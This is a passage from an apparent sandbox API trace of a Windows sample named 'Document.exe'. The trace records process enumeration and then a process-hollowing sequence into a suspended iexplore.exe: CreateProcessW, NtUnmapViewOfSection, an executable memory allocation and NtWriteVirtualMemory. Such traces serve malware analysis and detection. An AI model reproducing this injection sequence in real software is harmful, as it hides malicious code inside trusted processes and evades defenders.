returned 0x104 [0199.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.209] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0199.210] GetLastError () returned 0x12b [0199.210] CloseHandle (hObject=0x108) returned 1 [0199.210] GetLastError () returned 0x12b [0199.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x0 [0199.210] GetLastError () returned 0x5 [0199.210] CloseHandle (hObject=0x0) returned 0 [0199.210] GetLastError () returned 0x6 [0199.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x0 [0199.210] GetLastError () returned 0x5 [0199.210] CloseHandle (hObject=0x0) returned 0 [0199.210] GetLastError () returned 0x6 [0199.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x0 [0199.210] GetLastError () returned 0x5 [0199.210] CloseHandle (hObject=0x0) returned 0 [0199.210] GetLastError () returned 0x6 [0199.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa78) returned 0x0 [0199.210] GetLastError () returned 0x5 [0199.210] CloseHandle (hObject=0x0) returned 0 [0199.210] GetLastError () returned 0x6 [0199.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x0 [0199.210] GetLastError () returned 0x5 [0199.211] CloseHandle (hObject=0x0) returned 0 [0199.211] GetLastError () returned 0x6 [0199.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x278) returned 0x108 [0199.211] GetLastError () returned 0x6 [0199.211] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0199.211] GetLastError () returned 0x12b [0199.211] CloseHandle (hObject=0x108) returned 1 [0199.211] GetLastError () returned 0x12b [0199.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x0 [0199.211] GetLastError () returned 0x5 [0199.211] CloseHandle (hObject=0x0) returned 0 [0199.211] GetLastError () returned 0x6 [0199.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0199.211] GetLastError () returned 0x5 [0199.211] CloseHandle (hObject=0x0) returned 0 [0199.211] GetLastError () returned 0x6 [0199.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa38) returned 0x108 [0199.212] GetLastError () returned 0x6 [0199.212] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.212] GetLastError () returned 0x0 [0199.213] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x400000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="Document.exe") returned 0xc [0199.213] GetLastError () returned 0x0 [0199.213] SysStringByteLen (bstr="潄畣敭瑮攮數") returned 0x104 [0199.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.214] VarBstrCmp (bstrLeft="IEXPLORE.EXE", bstrRight="DOCUMENT.EXE", lcid=0x0, dwFlags=0x30001) returned 0x2 [0199.214] CloseHandle (hObject=0x108) returned 1 [0199.214] GetLastError () returned 0x0 [0199.214] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa68) returned 0x108 [0199.214] GetLastError () returned 0x0 [0199.215] EnumProcessModules (in: hProcess=0x108, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0199.216] GetLastError () returned 0x0 [0199.217] GetModuleBaseNameA (in: hProcess=0x108, hModule=0x400000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="Document.exe") returned 0xc [0199.217] GetLastError () returned 0x0 [0199.217] SysStringByteLen (bstr="潄畣敭瑮攮數") returned 0x104 [0199.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0199.218] VarBstrCmp (bstrLeft="IEXPLORE.EXE", bstrRight="DOCUMENT.EXE", lcid=0x0, dwFlags=0x30001) returned 0x2 [0199.218] CloseHandle (hObject=0x108) returned 1 [0199.218] GetLastError () returned 0x0 [0199.218] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x0 [0199.218] GetLastError () returned 0x5 [0199.218] CloseHandle (hObject=0x0) returned 0 [0199.218] GetLastError () returned 0x6 [0199.218] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.218] SafeArrayDestroyDescriptor (psa=0x3810068) returned 0x0 [0199.218] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.219] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.219] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.219] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.219] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.219] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.219] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.219] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.219] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.219] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.219] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.219] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.219] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.219] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.219] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x37d0048*, NumberOfBytesToWrite=0x2, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0048*, NumberOfBytesWritten=0x0) returned 0x0 [0199.219] GetLastError () returned 0x578 [0199.220] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.220] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0199.220] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f770 | out: ppsaOut=0x18f770) returned 0x0 [0199.220] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0199.220] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.220] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0199.220] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.220] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0199.220] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.220] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0199.220] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.220] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0199.221] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.221] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f640 | out: ppsaOut=0x18f640) returned 0x0 [0199.221] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.221] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.221] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f774, Buffer=0x37d0084*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0084*, NumberOfBytesWritten=0x0) returned 0x0 [0199.221] GetLastError () returned 0x578 [0199.221] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.221] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f8b4, pvarResult=0x18f8a4 | out: pvarResult=0x18f8a4) returned 0x0 [0199.221] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.221] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.221] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.221] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.222] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.222] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.222] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.222] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.222] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.222] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.222] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.222] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.222] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.222] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.222] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x37d00f8*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d00f8*, NumberOfBytesWritten=0x0) returned 0x0 [0199.222] GetLastError () returned 0x578 [0199.222] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.222] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0199.222] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.223] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.223] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.223] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.223] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.223] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.223] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.223] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.223] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.223] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.223] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.223] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.223] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.223] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.223] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x37d012c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d012c*, NumberOfBytesWritten=0x0) returned 0x0 [0199.223] GetLastError () returned 0x578 [0199.224] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.224] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0199.224] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.224] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.224] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.224] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.224] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.224] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.224] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.224] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.224] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.225] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.225] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.225] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.225] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.225] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.225] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.225] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.225] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.225] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.225] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.225] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.225] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.225] SafeArrayDestroyDescriptor (psa=0x380f108) returned 0x0 [0199.225] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1 [0199.225] CreateProcessW (in: lpApplicationName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpCommandLine=" C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x5da078*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5dcfc0 | out: lpCommandLine=" C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpProcessInformation=0x5dcfc0*(hProcess=0x104, hThread=0x108, dwProcessId=0x35c, dwThreadId=0xf0)) returned 1 [0199.327] GetLastError () returned 0x715 [0199.327] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.327] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0199.328] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.328] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.328] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.329] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.329] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.329] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.329] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc0000019 [0199.329] NtUnmapViewOfSection (ProcessHandle=0x104, BaseAddress=0x400000) returned 0xc0000019 [0199.329] GetLastError () returned 0x578 [0199.329] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.329] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0199.329] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0199.329] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.330] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.330] SafeArrayDestroyDescriptor (psa=0x380f150) returned 0x0 [0199.330] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.330] SafeArrayDestroyDescriptor (psa=0x380f150) returned 0x0 [0199.330] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.330] SafeArrayDestroyDescriptor (psa=0x380f150) returned 0x0 [0199.330] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.330] SafeArrayDestroyDescriptor (psa=0x380f150) returned 0x0 [0199.330] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.331] SafeArrayDestroyDescriptor (psa=0x380f150) returned 0x0 [0199.331] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.331] SafeArrayDestroyDescriptor (psa=0x380f150) returned 0x0 [0199.331] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.331] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x37d0148*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0148*, NumberOfBytesWritten=0x0) returned 0x0 [0199.331] GetLastError () returned 0x578 [0199.331] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.332] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.332] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.332] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.332] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.332] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.332] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.332] SafeArrayDestroyDescriptor (psa=0x380f0c8) returned 0x0 [0199.332] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.332] NtAllocateVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x4070c0*=0x400000, ZeroBits=0x0, RegionSize=0x18f8e4*=0x43000, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x4070c0*=0x400000, RegionSize=0x18f8e4*=0x43000) returned 0x0 [0199.333] GetLastError () returned 0x578 [0199.333] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.333] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0199.333] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.334] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.334] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.334] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.334] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.334] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.334] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.334] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.334] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.334] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.334] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.334] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.334] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.334] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.334] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x37d014c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d014c*, NumberOfBytesWritten=0x0) returned 0x0 [0199.334] GetLastError () returned 0x578 [0199.334] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.334] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.335] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.335] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.335] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.335] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.336] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.336] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.336] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.336] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.336] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.336] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.336] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.336] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.336] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.336] NtWriteVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x400000, Buffer=0x37d0048*, NumberOfBytesToWrite=0x1000, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0048*, NumberOfBytesWritten=0x0) returned 0x0 [0199.337] GetLastError () returned 0x578 [0199.337] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.337] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f8d4, pvarResult=0x18f8c4 | out: pvarResult=0x18f8c4) returned 0x0 [0199.337] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.338] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.339] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.339] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.339] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.339] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.339] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.339] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.339] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.339] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.339] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.339] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.339] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.339] CallWindowProcA (lpPrevWndFunc=0x5dee10, 